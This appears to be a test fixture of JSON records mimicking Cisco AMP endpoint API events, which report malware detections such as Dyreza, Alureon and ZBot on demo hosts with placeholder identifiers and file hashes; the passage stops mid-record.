-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257589777531000,"timestamp":1610705510,"timestamp_nanoseconds":224000000,"date":"2021-01-15T10:11:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257589777530944","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257564007727000,"timestamp":1610705504,"timestamp_nanoseconds":218000000,"date":"2021-01-15T10:11:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257564007727167","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257512468120000,"timestamp":1610705492,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:11:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257512468119614","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257460928512000,"timestamp":1610705480,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:11:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257460928512061","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789131","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"5A.tmp","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\5A.tmp","identity":{"sha256":"aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33","sha1":"420da91c3199993c9f245b21ea060b69d7ecfd49","md5":"bfcc0861c7fb965c1f7473d3dc42cff6"},"parent":{"process_id":1480,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"e0b07f08e60ffbad36c2e58180f4b2a16dca47716044cbe0213df7b74d742f1f","sha1":"e6e904b84332191d44de729deb7bfed9bcef2ce9","md5":"60784f891563fb1b767f70117fc2428f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":156000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"},"parent":{"process_id":1892,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":93000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789129","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"57.tmp","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\57.tmp","identity":{"sha256":"aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33","sha1":"420da91c3199993c9f245b21ea060b69d7ecfd49","md5":"bfcc0861c7fb965c1f7473d3dc42cff6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":93000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Alureon:Olmarik-tpd","detection_id":"5825617812646789128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"58.tmp","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\58.tmp","identity":{"sha256":"34e2a286618a82905957c64397999e2d38092ff6b7c0c21192760376c9036f1a","sha1":"d8e5ded034afbb77ca3759e35dd0f200255a6fd5","md5":"1ef0e0c765da7f727e1eb8ff38d02ff1"},"parent":{"process_id":1480,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"e0b07f08e60ffbad36c2e58180f4b2a16dca47716044cbe0213df7b74d742f1f","sha1":"e6e904b84332191d44de729deb7bfed9bcef2ce9","md5":"60784f891563fb1b767f70117fc2428f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":78000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789127","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":812000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821830","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"59.tmp","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\59.tmp","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5","sha1":"bc29f1e8460915596e1dcafd0c92d6309457d149","md5":"4a052246c5551e83d2d55f80e72f03eb"},"parent":{"process_id":3728,"disposition":"Malicious","file_name":"tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":812000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821829","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"56.tmp","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\56.tmp","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"},"parent":{"process_id":3728,"disposition":"Malicious","file_name":"tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821827","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821828","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821825","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821826","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257413683872000,"timestamp":1610705469,"timestamp_nanoseconds":56000000,"date":"2021-01-15T10:11:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257409388904508","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900267000300,"timestamp":1610705459,"timestamp_nanoseconds":267000000,"date":"2021-01-15T10:10:59+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"Eldorado:Alureon-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705459,"start_date":"2021-01-15T10:10:59+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257357849297000,"timestamp":1610705456,"timestamp_nanoseconds":607000000,"date":"2021-01-15T10:10:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257357849296955","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667064295457000,"timestamp":1610705453,"timestamp_nanoseconds":478000000,"date":"2021-01-15T10:10:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667064295456780","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257340669428000,"timestamp":1610705452,"timestamp_nanoseconds":988000000,"date":"2021-01-15T10:10:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257340669427770","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667055705522000,"timestamp":1610705451,"timestamp_nanoseconds":565000000,"date":"2021-01-15T10:10:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667055705522187","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832268414885822000,"timestamp":1610705411,"timestamp_nanoseconds":13000000,"date":"2021-01-15T10:10:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832268410590855181","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3756858138.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3756858138.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":3020,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sh